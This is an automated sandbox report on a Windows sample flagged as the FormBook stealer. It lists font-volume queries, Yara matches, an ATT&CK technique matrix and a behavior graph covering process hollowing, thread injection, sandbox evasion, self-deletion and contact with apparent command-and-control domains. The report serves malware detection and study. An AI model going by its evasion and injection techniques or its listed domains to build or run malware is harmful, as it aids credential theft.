            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Entity\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Entity.dll VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 6.2.EH5ro3Hyug.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.EH5ro3Hyug.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000000.730557103.0000000006BFF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.691567196.0000000003BF1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.753692091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.934957623.00000000037B0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.934785962.0000000003080000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.754960764.0000000001890000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.714656452.0000000006BFF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.934221004.0000000002A80000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.754337166.0000000001860000.00000040.00020000.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 6.2.EH5ro3Hyug.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.EH5ro3Hyug.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000000.730557103.0000000006BFF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.691567196.0000000003BF1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.753692091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.934957623.00000000037B0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.934785962.0000000003080000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.754960764.0000000001890000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.714656452.0000000006BFF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.934221004.0000000002A80000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.754337166.0000000001860000.00000040.00020000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1Input Capture1Process Discovery2Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing12Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 491359 Sample: EH5ro3Hyug Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 7 other signatures 2->46 10 EH5ro3Hyug.exe 3 2->10         started        process3 file4 32 C:\Users\user\AppData\...H5ro3Hyug.exe.log, ASCII 10->32 dropped 58 Tries to detect virtualization through RDTSC time measurements 10->58 60 Injects a PE file into a foreign processes 10->60 14 EH5ro3Hyug.exe 10->14         started        17 EH5ro3Hyug.exe 10->17         started        signatures5 process6 signatures7 62 Modifies the context of a thread in another process (thread injection) 14->62 64 Maps a DLL or memory area into another process 14->64 66 Sample uses process hollowing technique 14->66 68 Queues an APC in another process (thread injection) 14->68 19 explorer.exe 14->19 injected process8 dnsIp9 34 sherwoodmastiff.com 160.153.136.3, 49816, 80 GODADDY-AMSDE United States 19->34 36 www.sherwoodmastiff.com 19->36 38 www.kingtreemusic.com 19->38 48 System process connects to network (likely due to code injection or exploit) 19->48 23 WWAHost.exe 19->23         started        26 autoconv.exe 19->26         started        signatures10 process11 signatures12 50 Self deletion via cmd delete 23->50 52 Modifies the context of a thread in another process (thread injection) 23->52 54 Maps a DLL or memory area into another process 23->54 56 Tries to detect virtualization through RDTSC time measurements 23->56 28 cmd.exe 1 23->28         started        process13 process14 30 conhost.exe 28->30         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            EH5ro3Hyug.exe32%VirustotalBrowse
